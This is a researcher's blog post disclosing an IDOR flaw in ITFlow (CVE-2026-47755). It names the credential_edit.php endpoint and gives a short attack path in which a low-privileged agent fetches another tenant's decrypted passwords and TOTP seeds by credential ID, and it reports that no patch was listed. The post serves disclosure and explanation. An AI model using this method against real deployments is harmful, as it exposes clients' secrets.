Logo
Overview
cross-tenant credential disclosure in itflow

cross-tenant credential disclosure in itflow

b4r b4r
May 25, 2026
3 min read
vulnerability cve web exploitation idor

TL;DR

This one came from ITFlow and ended up as CVE-2026-47755.

The bug was simple in a very bad way: a low-privileged authenticated agent could request another client’s credential edit modal directly and get back decrypted secrets that should never have been exposed to them.

Not hashed junk. Not partial leakage. Actual useful stuff:

  • plaintext passwords
  • usernames
  • TOTP seeds
  • and even live TOTP values through a related endpoint

Why I liked this one

I always like bugs where the normal UI says one thing, but the actual backend says something else entirely.

In the UI, the restricted user could only see their own client. Everything looked fine there.

But the moment you stop clicking around normally and just ask the modal endpoint for another credential_id, the whole boundary falls apart.

That is the kind of bug that feels clean when you confirm it. No weird setup. No fragile exploit chain. Just a direct object access problem on sensitive data.

The vulnerable endpoint

GET /agent/modals/credential/credential_edit.php?id=<credential_id>

According to the advisory, the endpoint only required an authenticated session and then looked up the requested credential directly by ID.

That means the attack path was basically:

  1. log in as a low-privileged agent
  2. keep the valid session cookies
  3. request another tenant’s credential_id
  4. receive decrypted secrets inside the returned modal HTML

That is about as straightforward as it gets.

What was missing

The core problem was object-level authorization.

The advisory explicitly says the endpoint did not:

  • call enforceClientAccess()
  • verify that the credential belonged to a client the current user was allowed to access
  • stop decrypted secret material from being rendered back into the HTML response

So even though the restricted user was scoped correctly in the visible UI, the modal endpoint ignored that tenant boundary.

Why the impact is real

This was not just “you can see a name you should not see.”

The returned modal could include:

  • credential username
  • credential password
  • OTP secret

And the advisory also notes a related endpoint that could leak the live TOTP token cross-tenant too.

At that point, this is not a cosmetic tenant-isolation issue anymore. It is direct secret disclosure across clients.

The part that made it nice as a find

What I liked here is that the exploit path was easy to explain.

The restricted user could not see Client Two in the normal interface, but could still request credential_id=2 directly and recover the secret material from the modal response.

That kind of before-and-after is always good evidence:

  • normal UI says access is restricted
  • direct object request proves the restriction is fake

Severity and CVSS

The public advisory lists this as Moderate with:

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Which makes sense here.

This is an authenticated bug, but once you have the low-privileged session, the exploitation is direct and the confidentiality impact is high.

Affected version

The advisory lists:

  • Package: itflow-org/itflow
  • Affected: <= 26.04
  • Patched: None

So at the time of the public advisory, there was no patched version listed yet.

Reference